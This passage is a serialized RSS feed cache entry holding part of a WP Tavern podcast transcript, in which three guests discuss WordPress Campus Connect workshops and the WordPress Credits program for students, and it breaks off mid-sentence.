03 Sep 2025 16:36:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:47;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:140:\"WPTavern: #183 – Destiny Kanno, Isotta Peira and Anand Upadhyay on how WordPress is shaping the future of education for students worldwide\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"https://wptavern.com/?post_type=podcast&p=199013\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:153:\"https://wptavern.com/podcast/183-destiny-kanno-isotta-peira-and-anand-upadhyay-on-how-wordpress-is-shaping-the-future-of-education-for-students-worldwide\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:75449:\"<details>Transcript<div>\n<p>[00:00:19] <strong>Nathan Wrigley:</strong> Welcome to the Jukebox Podcast from WP Tavern. My name is Nathan Wrigley.</p>\n\n\n\n<p>Jukebox is a podcast which is dedicated to all things WordPress, the people, the events, the plugins, the blocks, the themes, and in this case, how WordPress is shaping the future of education for students worldwide.</p>\n\n\n\n<p>If you&#8217;d like to subscribe to the podcast, you can do that by searching for WP Tavern in your podcast player of choice, or by going to wptavern.com/feed/podcast, and you can copy that URL into most podcast players.</p>\n\n\n\n<p>If you have a topic that you&#8217;d like us to feature on the podcast, I&#8217;m keen to hear from you and hopefully get you, or your idea, featured on the show. Head to wptavern.com/contact/jukebox, and use the form there.</p>\n\n\n\n<p>So on the podcast today, we have Destiny Kanno, Isotta Peira, and Anand Upadhyay.</p>\n\n\n\n<p>Destiny is the Head of Community Education at Automattic. Isotta is the leader of the WordPress Credits Initiative for students, and Anand is the founder of WordPress Campus Connect.</p>\n\n\n\n<p>This episode is all about how WordPress is not only powering websites, but also empowering the next generation of learners and creators. You&#8217;ll hear about the growing movement of education focused WordPress events happening worldwide, from hands-on workshops on university campuses in India, to student clubs designed to keep the momentum going after introductory events.</p>\n\n\n\n<p>Anand shares how WP Campus Connect is bringing WordPress directly to students, reducing barriers to entry, and helping bridge the gap between academic learning and real world tech skills. We also explore the challenges of organizing these events, from convincing institutions of the value of open source, to fostering genuine community involvement among both students and educators.</p>\n\n\n\n<p>Isotta then introduces us to the WordPress Credits Program, an initiative that lets students turn their contributions to the WordPress ecosystem into recognized academic credits at universities like, Pisa in Italy. It&#8217;s a win-win. Students gain practical resume worthy experience, while educational institutions get a transferable, skills focused, program that prepares learners for the jobs of the future.</p>\n\n\n\n<p>Whether you&#8217;re an educator, a WordPress enthusiast, or just someone who cares about open source and community, this episode is packed with actionable insights. The guests share how flexible and resilient these education initiatives are, how you can get involved, and why engaging the next generation is not just important, but essential for the continued growth and sustainability of the WordPress community.</p>\n\n\n\n<p>It&#8217;s a truly inspiring episode, and is at the intersection of so many areas of profound importance.</p>\n\n\n\n<p>If you&#8217;re curious about how to bring WordPress into your local school, university, or community, or if you just want to hear how WordPress is making a difference far beyond the web, this episode is for you.</p>\n\n\n\n<p>If you&#8217;re interested in finding out more, you can find all of the links in the show notes by heading to wptavern.com/podcast, where you&#8217;ll find all the other episodes as well.</p>\n\n\n\n<p>And so without further delay, I bring you Destiny Kanno, Isotta Peira and Anand Upadhyay.</p>\n\n\n\n<p>I am joined on the podcast by Destiny Kanno, by Isotta Peira, and also by Anand Upadhyay. Welcome all three of you. Thanks for joining me today.</p>\n\n\n\n<p>Now just before we begin this podcast, we&#8217;re going to be talking about education, the education landscape, and how WordPress combines with that. I hope during the course of this conversation, you will get an impression that this is something which is very dear to my heart. We don&#8217;t need to go into that, but this is about the most profoundly purposeful use of a CMS that I can actually imagine. I mean, I&#8217;m sure there&#8217;s other scenarios for other people, but for me, this is the perfect sweet spot. Education, WordPress, open source software. It doesn&#8217;t basically get better than that for me.</p>\n\n\n\n<p>So with that out of the way, I think it would be good to go round the houses one at a time and just give a little short biography of who you are, where you work, what your history is with WordPress, something like that. You can make it as long or as short as you like, but if we keep it under a minute, maybe something like that, that would be good. So let&#8217;s go to Destiny first.</p>\n\n\n\n<p>[00:04:46] <strong>Destiny Kanno:</strong> Yes. Hi there, I&#8217;m Destiny. I&#8217;m currently head of community education at Automattic. I&#8217;m a sponsored contributor in the .org space. And yes, before working on the exciting new initiatives we&#8217;re going to chat through today, I was working alongside the training team, two years as a training team rep, helping build out content, like online workshops and courses and learning pathways. And I was part of the group of folks that brought that new relaunch live last year. So yeah, exciting stuff, and that&#8217;s what I&#8217;m up to right now.</p>\n\n\n\n<p>[00:05:23] <strong>Nathan Wrigley:</strong> Okay, that&#8217;s great. Thank you so much. We have some context there, that&#8217;s lovely. And okay, let&#8217;s go to Isotta. Do you want to give us your bio next?</p>\n\n\n\n<p>[00:05:30] <strong>Isotta Peira:</strong> Sure. Thanks a lot Nathan for inviting us and, yeah. I&#8217;m Isotta, I&#8217;ve been around the community since, WordPress community since 2022 when I joined Automattic, and I&#8217;ve been a sponsored contributor since then. For the past year, three years, four years, I&#8217;ve been contributing full time to the community team. And recently this year I switched on to the educational initiative, and I&#8217;m currently leading the WordPress Credits program for students.</p>\n\n\n\n<p>[00:06:01] <strong>Nathan Wrigley:</strong> Okay, thank you very much. And finally, Anand.</p>\n\n\n\n<p>[00:06:04] <strong>Anand Upadhyay:</strong> Hi, my name is Anand, and I am running a WordPress plugin development company WPVibes. I am a user of WordPress from the last 15 years, since 2010 I&#8217;m using WordPress for various purposes.</p>\n\n\n\n<p>I have been contributing to WordPress through much multiple channels like Core, docs, polyglots, jumping from one team to another. And from the last year, I have found like my new passion. Just like you, I am also passionate about education and teaching. So from the last year, I found this idea of WordPress Campus Connect, and currently I&#8217;m very much involved in trying to bring it to the broader community.</p>\n\n\n\n<p>[00:06:39] <strong>Nathan Wrigley:</strong> Thank you so much. So I think we&#8217;ve established that the panelists today, there&#8217;s a lot of really meaningful contributions in all of your past, especially around WordPress and education. So let&#8217;s dig into that a little bit. As I said at the top of this show, I can&#8217;t see a more meaningful use of WordPress, frankly.</p>\n\n\n\n<p>I mean, I don&#8217;t know what it&#8217;s like in the places where you live, but in the UK where I live, education is one of those things where we like to talk about it being a priority, but the finances kind of don&#8217;t really match up to that aspiration. And so things like ICT, websites, coding, all of that, it&#8217;s a nice thing to have, but I think often it gets left in the background a little bit.</p>\n\n\n\n<p>And because of that, things like open source platforms, I feel there&#8217;s a really great use of that, not only from the educator&#8217;s point of view, you know, people that can use those platforms to help with their class education, maybe set up a community website, maybe set up a school website or something like that. But also from the point of view of learners, people who wish to get a leg up in life, and figure that maybe learning technology and learning how to build on the web is a credible place for them to start.</p>\n\n\n\n<p>So let&#8217;s just go through, where is WordPress at the moment in the educational landscape? I know that&#8217;s incredibly broad because we haven&#8217;t sort of pinned it down to any of the projects. Where are we at? What are the initiatives that are going on at the moment? So, again, anybody that wants to jump in, if we do a bit of crosstalking, so be it. But anybody that wants to jump in, just go for it.</p>\n\n\n\n<p>[00:08:13] <strong>Destiny Kanno:</strong> I&#8217;ll start from like what I&#8217;ve observed a little bit. I&#8217;m pretty new to the Community Team itself and this event space, but I have seen that there have been a few education related events happening throughout the years, regardless of WordPress Campus Connect.</p>\n\n\n\n<p>Like in Africa, they recently had their, I think it&#8217;s annual event, I believe in Uganda. And that has been going on for a while. It just hasn&#8217;t been under like the name WordPress Campus Connect.</p>\n\n\n\n<p>And then I believe as well, and correct me if I&#8217;m wrong, there was, with Sebastian in Poland, this like WordPress Academy, like they&#8217;re also doing like education type events and initiatives. But when it comes to now this WordPress Campus Connect, it&#8217;s an official event series, like do_action. It has like more intention around that. And I think because when you go in and you, you know, apply to organise, and now there&#8217;s this way to do it through WordPress Campus Connect, it&#8217;s just going to bring those initiatives that are already happening into like a more streamlined funnel of people seeing that it&#8217;s happening, I think, in a more, how do I say it?</p>\n\n\n\n<p>[00:09:21] <strong>Nathan Wrigley:</strong> Cohesive would be the word.</p>\n\n\n\n<p>[00:09:22] <strong>Destiny Kanno:</strong> Yeah, cohesive way. Thank you.</p>\n\n\n\n<p>[00:09:24] <strong>Nathan Wrigley:</strong> Yeah, so I guess what you&#8217;re saying there is that there&#8217;s a lot of people out there in the WordPress community, many of whom might be educators or, you know, working in a school or what have you, and that they&#8217;ve rolled their own thing like we all have with WordPress. And that&#8217;s great. That&#8217;s one of the benefits of having open source software. You download it, roll your own, what have you.</p>\n\n\n\n<p>But it&#8217;s also, it&#8217;s nice, it&#8217;s meaningful, it&#8217;s impactful if everybody can see, oh, there&#8217;s a bigger, kind of more organised piece somewhere. And it may not fit exactly what I&#8217;m doing, but at least I can see that it can be deployed this way. Maybe I can talk to those people, get some intuitions and ideas from those people and what have you, yeah.</p>\n\n\n\n<p>[00:10:01] <strong>Isotta Peira:</strong> I wanted to jump in and connect with what Destiny was saying because this is exactly what happened from the community perspective. So talking about events, a few years ago we were seeing the Training Team doing a lot of great progress around education and the Community Team around events. But we weren&#8217;t that connected between contribution teams. And we&#8217;ve also, as like project wise, we were seeing also the need to bring a different type of audience to the WordPress events.</p>\n\n\n\n<p>And we weren&#8217;t exploring at all the education field. With all the students around the world, we weren&#8217;t like taking care of them in our programs. So from the Community Team, they kind of encourage organisers all over the world to come up with new diverse format for events. And in 2023 it was launched this, it was called at the time next generation of WordPress events.</p>\n\n\n\n<p>And one of the formats that stood out was exactly the Campus Connect brought up by Anand and the community. And other events like the Website challenge, and the others that&#8217;s been mentioned. And as he was saying, then we have had the time now to come back, connect the pieces between different contribution teams, and be able to offer something recognisable, standardised, something not as overwhelming as sometimes open source programs are.</p>\n\n\n\n<p>And so we hope not just to reach a wider audience of students, but also to empower more teachers, more trainings, and anybody else in the community into bringing WordPress in any different type of education at different levels. With the support of course of the community.</p>\n\n\n\n<p>[00:11:47] <strong>Nathan Wrigley:</strong> We will get into the bits that WP Campus Connect do in a moment, but just coming back to something that you said there, it feels to me, if I browse around in the WordPress landscape, and trust me, I browse around in the WordPress landscape rather a lot. It always feels to me as if, how to describe this, initiatives where companies sell WordPress on, they build things and there&#8217;s a fee involved. You know, so you&#8217;re a web agency or what have you, you build the thing and you sell it on.</p>\n\n\n\n<p>That seems to dominate the conversation. And the more philanthropic side of things, the education piece, the bit where you&#8217;re just, you&#8217;re doing the work because it&#8217;s meaningful, and perhaps you are not getting remunerated for it. That bit somehow gets, well, it gets ignored. It somehow is the silent relation of the for-profit things. You know, you hang out in Facebook groups and you hang out on Twitter, X, whatever, online, it&#8217;s always the for-profit bit, which seems to be making the noise, you know, the plugins, the themes, and rah, rah, rah.</p>\n\n\n\n<p>And this kind of stuff seems to get left. And I don&#8217;t know why that is, but it&#8217;s, hopefully this podcast is addressing some of that.</p>\n\n\n\n<p>Anyway, sorry Anand, I think it&#8217;s your turn to have a little bit of a chat with us. Tell us about, yeah, the same question really, your experience in the education space and where you think WordPress is at at the moment.</p>\n\n\n\n<p>[00:13:02] <strong>Anand Upadhyay:</strong> Yeah, so just as you explained about the state of education in the UK, so the same is in our region, India as well. So students in the academic life are slightly disconnected with the, what is happening in the industry? So there is like a gap between the academics and the industry. So through these kind of events, we are empowering the students to come closer to what really happening in there.</p>\n\n\n\n<p>And we are also helping them to make aware about the various carrier opportunities that WordPress ecosystem can bring to them. It&#8217;s not like about just one thing, it&#8217;s also about if someone is interested in programming, someone is interested in designing, SEO, content. So there is something for everyone, right?</p>\n\n\n\n<p>So with this program, we are trying to connect the students with the various career opportunities, and also trying to bring some fresh energy to the WordPress ecosystem. They can become the contributors, they can bring their own fresh perspective. Because I have read somewhere the WordPress community in many areas is aging. We need that new fresh energy. So this kind of program can also address that problem.</p>\n\n\n\n<p>It&#8217;s always good to have more people getting involved in the contribution, like sort of just started with the WP Credit, which is bringing actually students to the contribution. And the Campus program is trying to introduce them to the WordPress. So all these kind of programmers combined with working towards getting more and more people getting involved in the WordPress ecosystem, and trying to make the project more sustainable in the long run.</p>\n\n\n\n<p>[00:14:28] <strong>Nathan Wrigley:</strong> It&#8217;s kind of interesting, I attend quite a lot of WordPress events, and particularly the flagship events so, you know, the WordCamp Asia&#8217;s and Europe&#8217;s and US and what have you. And, I think you&#8217;re right about the demographic. The demographic definitely skews older. It&#8217;s hard to see anything above, I would imagine 10% of the crowd that would be under the age of 20. I have no data to back any of that up. I&#8217;m kind of putting my finger in the air a little bit.</p>\n\n\n\n<p>But it feels like that. It feels like the demographic is, I don&#8217;t know, 30, 35, 40 and above. And if that were the only reason that you were doing WP Campus Connect, that in itself would be a credible reason, you know? But obviously there&#8217;s a lot more to it than that. But just that alone would be significant and important.</p>\n\n\n\n<p>And I think also, in a world dominated by proprietary platforms where everything is siloed, you don&#8217;t own your own data, the experience is exciting because there&#8217;s some kind of algorithm trying to hook into your brainstem, then we need to get these young people. And because we don&#8217;t have the marketing budgets of a Facebook or a TikTok or what have you, then we have to do it in different ways. And attaching an event to a campus, to a university, to an educational institution is a great way I think of doing this.</p>\n\n\n\n<p>So firstly, bravo, for getting this thing off the ground. Perhaps this one is for Anand again. I don&#8217;t know if he wants to take this question, but can you just describe what WP Campus Connect is? What&#8217;s involved in that? What&#8217;s the age group? Where are you doing it predominantly? How long has it been going? As much or as little as you like. And depending on what you give back to us, we can take it from there.</p>\n\n\n\n<p>[00:16:09] <strong>Anand Upadhyay:</strong> Yeah, so WordPress Campus Connect, there is no like fixed criteria on to whom you are going to deliver this. So the only thing is we are going to the students, we are going to their campus. We are not creating a kind of WordCamp kind of thing, or centralised workshop where everybody is coming to our venue and we are delivering them the knowledge, but it&#8217;s about going to their campus. And because this will reduce the friction, like if we are going to organise an event, centralised event, we are inviting everyone to join, then there will be a friction. A lot of people might not going to join. Maybe there were some valid reasons as well.</p>\n\n\n\n<p>So with Campus Connect, we are going to their campus and delivering the WordPress knowledge to them. And so far we have done this in the universities, postgraduate colleges, undergraduate students. And we are helping them to understand the WordPress, how WordPress can be a career choice for them, and how WordPress can be useful for whatever their interest is.</p>\n\n\n\n<p>Because as I already said, that there is students, if we are going to a college or university, that every student might have different kind of interests. Maybe they are enrolled in the same course, but still they have, might have some different kind of interests.</p>\n\n\n\n<p>So we are trying to explain them that they are with various career opportunities available so you can jump in. And we are doing it through the hands-on workshops. It&#8217;s not like that we are just doing a kind of seminar or lecture kind of thing. We are doing it in form of a kind of a hands-on workshop, like five to six hour workshop where we will help them to build their first website.</p>\n\n\n\n<p>And it&#8217;s not about like we want to make them expert in six hours. It&#8217;s not possible. So what we want to do is, we want to give them a feeling of accomplishment. This is something that is something interesting and this is something that we can use and build something.</p>\n\n\n\n<p>So this way, if they get some, after six hour workshop or five hours workshop, if they&#8217;re coming out with kind of feeling of accomplishment that this is interesting, we should explore it further, we should explore it more. So that&#8217;s our win.</p>\n\n\n\n<p>[00:18:05] <strong>Nathan Wrigley:</strong> Can I ask, in the part of the world where you are, is there a real hunger for this? Is there a real appetite for this? Because with the best will in the world, I think there might be a geographical divide in terms of interest and hunger for things like WordPress. And again, there&#8217;s no heuristics behind this, this is me supposing from what I&#8217;ve heard and conversations that I have had.</p>\n\n\n\n<p>It feels like in your part of the world, and you only have to look at plugin contributions, contributions to Core, events that are taking place in your neck of the woods. It seems like there&#8217;s a real appetite for it, that there may not be quite in the part of the world where I am from. So first of all, can we speak to that? Is that the case? Is it like, you know, you put this stuff on and people show up? You build it and they come?</p>\n\n\n\n<p>[00:18:56] <strong>Anand Upadhyay:</strong> Yeah, so there is a quite hunger. India is like a kind of a very large country and if you count the number of WordCamps that happening in India every year, it&#8217;s quite big. Right now, these are like two, three months where we don&#8217;t have any WordCamps because it&#8217;s mostly the rainy season in everywhere. Otherwise every month you will have one or two WordCamps. And the communities that are organising WordCamps struggle to find a date that is not conflicting with another WordCamp in the same country. So that&#8217;s how the things happen.</p>\n\n\n\n<p>If you talk about the beginning of this year, first three weekends have WordCamps in India, and all were very successful. So there is a kind of WordPress community is very engaging in India, and so the way everywhere.</p>\n\n\n\n<p>And also if you talk about the hunger in the students, so it can vary about what they are learning, what their background is, where they&#8217;re located. But, yeah, students from what we have interacted, because we interacted with the students who doesn&#8217;t have any knowledge. We got a very good response. We saw them talking about like, oh, this is great. We can do something amazing with this. We have a lot of ideas already. This is something that we can use to implement those ideas.</p>\n\n\n\n<p>So there is surely a hunger, but we just need to give them a path like, this is the path, and you can follow this. And we need to ensure them, there&#8217;s big opportunities, big market opportunities are also waiting for them if they excellent with some skills in this segment.</p>\n\n\n\n<p>[00:20:20] <strong>Nathan Wrigley:</strong> Yeah, I think it&#8217;s true to say that more or less every young person, let&#8217;s go, child or young adult or what have you, has some sort of insatiable appetite to learn. But given the education that they&#8217;re presented with, given the opportunities that are put in front of them, their experience of life later on will be very different. And so if WordPress never comes on the menu for them, if nobody ever suggests, well, have a look at this thing, then they&#8217;ll never know about this thing. This whole wonderful world of online publishing and all of the myriad things that you can do around the WordPress ecosystem. And so WP Campus Connect, I guess is facilitating that.</p>\n\n\n\n<p>Now, curiously though, you said that you go to where the educational institution is. How does that work? How do you connect, so again, this doesn&#8217;t have to go to Anand, this can go to anybody. How do you connect the educator, let&#8217;s say, or the institution that wishes to put something on because, you know, their students might like it. How do you connect the educational institution with the people who then go in and provide this WordPress workshop and training? How does that work? How does that get paid for? Is it all voluntary? There&#8217;s a lot in there to unpack, but I hope you get the thrust of my question. How do all those jigsaw pieces fit together?</p>\n\n\n\n<p>[00:21:37] <strong>Anand Upadhyay:</strong> The first thing is it&#8217;s all voluntary. So just like in a WordCamp, we have an organising team, a team of organisers and speakers. Nobody&#8217;s getting paid for this. We are also doing it voluntary. We have a team of organisers, not specifically to me, every WordCamp has a team of organisers, have a team of volunteers, workshop facilitators who are organising the workshops. So it&#8217;s all voluntary, nobody&#8217;s getting paid.</p>\n\n\n\n<p>And also it&#8217;s free for students as well. There is no charge for students from the WordPress Campus team. So it&#8217;s not like we are putting a kind of a ticket to them. It&#8217;s completely free. Going to your question about getting the institutes convinced for letting us do the workshop in their campus, so it&#8217;s kind of a tricky thing.</p>\n\n\n\n<p>The first time we reached out to the institute, so it was very tricky. I get to the college with a pitch deck. So I pitched the complete idea, complete presentation to show them what is WordPress, what are the kind of community thing? Because every institute has this question like, why you are doing this? What are your benefit?</p>\n\n\n\n<p>And It&#8217;s the same thing that you said, we have to pass that bureaucracy before getting to the better benefit of the student. We have to go to the bureaucracy. And it&#8217;s a genuine question in their mind as well, because, not a lot of such communities exist that are doing these kind of free things voluntarily. For the students. So the first question we were asked is, why are you doing this? What are your benefits? And don&#8217;t expect anything from us.</p>\n\n\n\n<p>[00:22:58] <strong>Nathan Wrigley:</strong> It rings so bizarre in the world in which we live. Everything about that screams, hang on. Wait, where&#8217;s the catch? Where&#8217;s the sales pitch? What&#8217;s going to happen after the fact?</p>\n\n\n\n<p>[00:23:10] <strong>Anand Upadhyay:</strong> We have to work on with this way and we have to explain like complete things. We showed them that these are the big events that in the WordCamp ecosystem happens, and we are trying to create a unique initiative for students and we&#8217;ll be delivering everything free to them. And we were not going to charge, we just need you to provide the students and the required infrastructure.</p>\n\n\n\n<p>So the pitch is really tough. In some institutes we got very understanding people who understood what we are saying. Within the next 15 minutes, we got them convinced. In some places we have to discuss a lot of questions. But yeah, it was again, interesting experience as well. We got some general feedback from them as, because last time it was the very first time we were doing this kind of thing. We don&#8217;t have any reference, like we just have an idea like we are going through this thing. So we also brainstorm with them like, what are the expectation of your students? They also gave us some suggestions.</p>\n\n\n\n<p>So because in every institute you&#8217;ll find different kind of students, you have to plan your workshops, you have to plan your workflow according to the interest of the students. So that&#8217;s how we approached, yeah, to convince the institute is the most tricky part. Because other than that, if you have to do workshop, we have our facilitators who are already working in WordPress. So it&#8217;s not difficult for them to deliver the same knowledge to adults. The only barrier that we have is to convince the college and universities to join and become a partner.</p>\n\n\n\n<p>[00:24:32] <strong>Nathan Wrigley:</strong> And has that journey, that, I guess bridge that you&#8217;ve got to cross, has that now become more straightforward? In that, you&#8217;ve got a history of things that you&#8217;ve done. So it&#8217;s now more a case of, look, here&#8217;s the testimonials. Here&#8217;s the things that have happened. We have credibility, we&#8217;ve done it before. This is not brand new. Has that become an easier journey? In other words, the door is more open than it was the first few times around.</p>\n\n\n\n<p>[00:24:54] <strong>Anand Upadhyay:</strong> Yeah, so the last year it was very tough. We have to reach up to them, take appointment, go there and spend some time there. And this year in the institute where we have done this last year, I just sent them a message like, we are doing it again, and if you want to be a part, just fill this form and we will discuss further.</p>\n\n\n\n<p>It works. So it&#8217;s much easier. And to those who are not a partner last year, but they have seen our post on the social media after the event, and they reached out to us like somehow we missed it, this time connect with us whenever you are doing it again. So once you have done this thing, you have a credibility and you can just showcase them.</p>\n\n\n\n<p>After that event, we have got a lot of the students joining our meetup. Before that, I&#8217;m running our city meetup from 2017, and we barely get 10 to 12 members in every meetup. Right now we are doing the meetups of 40 to 50 members. And it&#8217;s a kind of amazing thing. And it&#8217;s not only about having a lot of the students only. After seeing the students joining in, after seeing our pictures and the sort of local community going on, some professionals are also jumping in to join the meetups.</p>\n\n\n\n<p>Because they see that there is something valuable going on. So they&#8217;re also joining. So this is something amazing, because this is a byproduct. You&#8217;ll be able to grow your local community. You&#8217;ll be able to strengthen your local community more.</p>\n\n\n\n<p>[00:26:10] <strong>Nathan Wrigley:</strong> I have such profound respect for what you are doing. It is almost bringing tears to my eyes. It&#8217;s incredible. Everything that you say there is just so philanthropic. It&#8217;s just philanthropy all the way down. College students probably don&#8217;t have a great deal of money to throw around. They would want to consume education, which will make their life prospects better. They would like that to be as affordable as possible.</p>\n\n\n\n<p>And you show up, like here&#8217;s a bunch of stuff and it&#8217;s completely free. Okay, that&#8217;s great. And then there&#8217;s this virtuous cycle of, okay, we do it each year. That becomes easier, because the testimonials work, and presumably you can spread out and the ripples will move around where you live. And then hopefully maybe hop through jurisdictions and borders and international, who knows? We can get to that.</p>\n\n\n\n<p>But then also this knock on effect, which was maybe unexpected, a consequence that was unexpected of the WordPress community, the meetups that you offer, the swelling there and swelling in the, we talked about the demographics earlier, it&#8217;s skewing younger. And if you can attract a percentage of those, and keep them sticking around in the community, they can then take on these roles in the future.</p>\n\n\n\n<p>And the whole thing kind of propels itself. What it needed was the prime mover, which was you, which is pretty incredible. So I don&#8217;t know if Destiny or Isotta want to add anything. I&#8217;m almost speechless.</p>\n\n\n\n<p>[00:27:31] <strong>Destiny Kanno:</strong> I did have like a few points I wanted to add to what everyone&#8217;s saying. Reducing barriers has been a huge factor of setting this up. Originally we were using like the previous event organisation form and were like, actually there&#8217;s a lot of stuff in here. It doesn&#8217;t make sense for this use case. So we really paid a lot of attention to just thinking differently for this, and treating it differently. We don&#8217;t have to use the same things as we had before.</p>\n\n\n\n<p>And Isotta said before, like it&#8217;s standardised in a way, but it&#8217;s flexible too. So even though we have this framework that people can come to, we don&#8217;t say, you can only do the event in this way. You can have a one day event, you could do a half day event, you could have event series over a couple weeks like Anand is doing, and that is totally cool. Like, however you want to run this, we are open to that, and we&#8217;re also here to mentor you and support you in that.</p>\n\n\n\n<p>And then I, a thought came to my mind as Anand was talking, and you Nathan as well about like, you know, what&#8217;s in it for the volunteers? And I&#8217;m like, I think it&#8217;s an opportunity for volunteers just as much as it is the students, because they&#8217;re also getting exposure to these universities. And I don&#8217;t know, maybe someone has an ambition to teach at university someday, or like at least teach about WordPress at a university. So, you know, as you go into these, yes, there&#8217;s a hundred percent the philanthropic aspect, but it&#8217;s also like a learning experience for you as well as a volunteer to be in that space with the students too.</p>\n\n\n\n<p>And then lastly, I wanted to say as well, like going a little bit back about the current climate and how it feels like we are kind of like aging, I&#8217;ve also noticed in my experience it&#8217;s like, we are all also just, this is probably very like, duh, but we&#8217;re all professionals, right? So we&#8217;re not really looking to talk to students most of the time. We&#8217;re looking to sell something or network or like talk to other professionals. So I do think that this is a great way to bring in that new batch of folks that are going to become professionals, hopefully in the WordPress space. But yeah, it&#8217;s just that renewal instead of like just trying to sell or buy from whoever&#8217;s there based off of whatever you&#8217;re currently working on in the WordPress space.</p>\n\n\n\n<p>[00:29:46] <strong>Nathan Wrigley:</strong> Thank you. Isotta, anything you want to throw in at this point?</p>\n\n\n\n<p>[00:29:49] <strong>Isotta Peira:</strong> Of course. I want to add one point about the aging discussion that we were having, because also, in my opinion, it is true what you, Nathan, said at the beginning that just only the fact of reaching younger people is a way to make the project more sustainable, long term. But also I would love everyone to think about the other way around, because what is WordPress giving to all these younger generations?</p>\n\n\n\n<p>Because wins are much, I mean, for how I see it, I see like a winning opportunity everywhere. Because it&#8217;s not just about reducing the age of the people involved in the project. If we reduce the age, but people are not engaged. If they&#8217;re not getting what they need, learning opportunities, networking opportunities, even just opportunities to understand that they have a whole world around them, they didn&#8217;t even know that it existed, which happened to me before I learned about WordPress community and WordPress, this is huge.</p>\n\n\n\n<p>So this is a real, like all this initiative are core of the service that will be giving to millions of students. For now, we are at thousands of students already, but, this would be available for any students worldwide. And this is a pretty big deal, I believe, for younger generation and their futures.</p>\n\n\n\n<p>[00:31:12] <strong>Nathan Wrigley:</strong> I think it&#8217;s, on every level this is just so remarkably interesting, and the growth of it hopefully we&#8217;ll get into the millions. Right now you say you&#8217;re in the thousands. It&#8217;s still remarkable.</p>\n\n\n\n<p>I want to sort of drill into it a little bit. So it feels like there&#8217;s this sort of double fronted marketplace aspect to it where WP Campus Connect kind of sits in the middle, and so you&#8217;ve got WP Campus Connect in the center, and then on the one side you&#8217;ve got the students and the institutions that those students attend. And then on the other side, you&#8217;ve got the educators who will come into that institution and WP Campus Connect is sort of like the fulcrum, the center, the spokes all lead into WP Campus Connect, and they do all the connecting and what have you.</p>\n\n\n\n<p>Let&#8217;s talk about the educator side. So this is people who already are familiar with WordPress. Are there any constraints on who you would welcome into WP Campus Connect there? Like, is there any level of expertise that you&#8217;ve got to have, or any kind of proof that you&#8217;ve got to go through that you, yourself would be a credible educator? I don&#8217;t know, so that&#8217;s open to anybody. Is there any kind of barrier to entry if you are an existing WordPresser and want to be involved?</p>\n\n\n\n<p>[00:32:20] <strong>Anand Upadhyay:</strong> Yeah, so far we have not planned any kind of a specific requirements or the limitations or criteria. So far we have picked from the local community members, like we just opened the call for facilitators, and all those who are interested in teaching. And they responded to it and we just picked them.</p>\n\n\n\n<p>We are doing a kind of a series of event to, I think five to six colleges in this time and going every weekend to one college. So we have a pool of four workshop facilitators and we&#8217;ll be rotating them to multiple colleges. So this is how it is working. So there is no kind of barrier kind of thing.</p>\n\n\n\n<p>We are just thinking about if they are ready for the community work, because there may be many educators, but there may not be everyone who will be doing it for free because we are not going to pay them anything. So if they have the community feeling, they have the community vibes and they can come forward for this. So that&#8217;s the only criteria we have. You have the WordPress knowledge, you have the love for community. Just come forward and join us for the event.</p>\n\n\n\n<p>[00:33:19] <strong>Nathan Wrigley:</strong> Okay, that&#8217;s great. Great to hear. So staying on that side of things then, I remember my forays in education, one of the things that was kind of drummed into me was, failing to plan is planning to fail. And so there was always this aspect of, if you&#8217;re going to stand up in front of a bunch of people, you have to be ready. You can&#8217;t necessarily, I mean you can, right? A workshop environment maybe maps to that pretty well, where you stand up and it&#8217;s led by what the audience, the students in this case, would like to hear.</p>\n\n\n\n<p>I&#8217;m wondering if there&#8217;s a curriculum which you have planned or do plan, or if somebody can kind of like drop in and just pick up the pieces of paper if you like and say, okay, here&#8217;s the lesson plan, if you like. WP Campus Connect has put these plans together, and we&#8217;re going to go and show these students how to do this.</p>\n\n\n\n<p>So that is my ignorance. I don&#8217;t know if that&#8217;s the kind of thing that you do. Do you provide materials for wannabe educators to deliver, or is it very much you create your own curriculum on the fly or however you wish to do that?</p>\n\n\n\n<p>[00:34:16] <strong>Anand Upadhyay:</strong> So we just meet together and just plan, just think about like how we can go on ahead, like what are the things that we to teach? And we just brainstorm it together. It&#8217;s not like we are giving the, because there is not much different between the organiser and workshop facilitators here. So we are all the community members, so we have just divided the roles, but we are all, they&#8217;re working towards the same goal.</p>\n\n\n\n<p>So we just all sit together, brainstorm the ideas, like what should we give to the students? So for example, last year we helped them to build a kind of a business website. So all the educators plan together. So we will follow this workflow, we will follow this approach. And we went to one college, we tried to do the same thing. We came back and then we again said what went wrong? What was difficult for the students to follow? How we can overcome them in the next college? We repeat, we improvise and deliver the same thing.</p>\n\n\n\n<p>This year we, again, we are planning, so we again sit together. And then we thought about, last year we helped them to create a kind of a simple business website, but we found that students were not connected with that. They built the same thing, but they didn&#8217;t utilise it later because it was not connected to them. So this year we are planning to help them to build their personal portfolio website, a kind of a resume, where they can showcase their projects, they can showcase their resume, they can showcase their work or learning what they have done. So we are planning that kind of website.</p>\n\n\n\n<p>So again, our workshop facilitators are working together, all those educators, and working together to create a kind of a reference website. And then we will guide them to recreate this, the same thing, adding 